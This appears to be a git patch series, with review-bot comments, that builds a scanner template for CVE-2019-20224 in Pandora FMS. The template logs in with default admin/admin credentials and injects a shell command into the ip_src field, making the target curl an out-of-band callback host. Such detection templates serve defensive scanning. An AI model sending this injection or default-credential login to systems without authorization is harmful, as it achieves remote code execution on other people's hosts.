From 277fe4d514f36ada7c125e5f8dcde684e4e59b9d Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sat, 16 Apr 2022 13:46:17 +0530
Subject: [PATCH 1/4] Create CVE-2019-20224.yaml
---
cves/2019/CVE-2019-20224.yaml | 33 +++++++++++++++++++++++++++++++++
1 file changed, 33 insertions(+)
create mode 100644 cves/2019/CVE-2019-20224.yaml
diff --git a/cves/2019/CVE-2019-20224.yaml b/cves/2019/CVE-2019-20224.yaml
new file mode 100644
index 0000000000..901723d27c
--- /dev/null
+++ b/cves/2019/CVE-2019-20224.yaml
@@ -0,0 +1,33 @@
+id: CVE-2019-20224
+
+info:
+ name: Pandorafms RCE
+ author: ritikchaddha
+ severity: critical
+ reference:
+ - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/
+ tags: pandorafms,rce,cve,cve2019
+
+requests:
+ - raw:
+ - |
+ POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw
+
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ part: interactsh_protocol
+ name: http
+ words:
+ - "http"
+
+ - type: status
+ status:
+ - 200
From c8894336554c33c272eb88cfd60b2b702ae43486 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 25 Apr 2022 03:28:12 +0400
Subject: [PATCH 3/4] Update CVE-2019-20224.yaml
---
cves/2019/CVE-2019-20224.yaml | 13 ++++++++++---
1 file changed, 10 insertions(+), 3 deletions(-)
diff --git a/cves/2019/CVE-2019-20224.yaml b/cves/2019/CVE-2019-20224.yaml
index 901723d27c..1d9d44f164 100644
--- a/cves/2019/CVE-2019-20224.yaml
+++ b/cves/2019/CVE-2019-20224.yaml
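Review bot: The `info` block of the new file in PATCH 1/4 has no `description` or `remediation`, so a finding does not tell the reader what was tested or how to fix the host. A short `description` should say that the check confirms the flaw by making the target run a `curl` callback through the `ip_src` parameter, and that the referenced write-up describes the issue as authenticated. A `remediation` line should point to the vendor's fixed release. Because the payload executes a command on the scanned system rather than only reading a response, adding `intrusive` to `tags` would let operators exclude it from unattended scans.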
@@ -3,13 +3,20 @@ id: CVE-2019-20224 info: name: Pandorafms RCE author: ritikchaddha - severity: critical + severity: high reference: - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ - tags: pandorafms,rce,cve,cve2019 + tags: pandorafms,rce,cve,cve2019,authenticated,oast requests: - raw: + - | + POST /pandora_console/index.php?login=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + nick=admin&pass=admin&login_button=Login + - | POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1 Host: {{Hostname}} @@ -17,11 +24,11 @@ requests: date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw + cookie-reuse: true redirects: true max-redirects: 2 matchers-condition: and matchers: - - type: word part: interactsh_protocol name: http From 7e1ccf10c90b981fca5e6b52ecfa6336be40a375 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 May 2022 15:56:32 +0530 Subject: [PATCH 4/4] Update CVE-2019-20224.yaml --- cves/2019/CVE-2019-20224.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-20224.yaml b/cves/2019/CVE-2019-20224.yaml index 1d9d44f164..77cc6ea991 100644 --- a/cves/2019/CVE-2019-20224.yaml +++ b/cves/2019/CVE-2019-20224.yaml @@ -1,11 +1,12 @@ id: CVE-2019-20224 info: - name: Pandorafms RCE + name: Pandorafms - Remote Code Execution author: ritikchaddha severity: high reference: - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20224 tags: pandorafms,rce,cve,cve2019,authenticated,oast requests:
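Review bot: The login request added in PATCH 3/4 hard-codes `nick=admin&pass=admin`, so the check only reaches the netflow endpoint on installs that still use those credentials. Nothing in `matchers` confirms that the login succeeded, so on any other host the template silently reports nothing, even when the vulnerable code is present. I would state this dependency in the `info` block and let the operator supply credentials, e.g. `nick={{username}}&pass={{password}}&login_button=Login`, so that an owner scanning their own instance does not read a clean result as "patched". The `requests` block continues past the end of the second hunk.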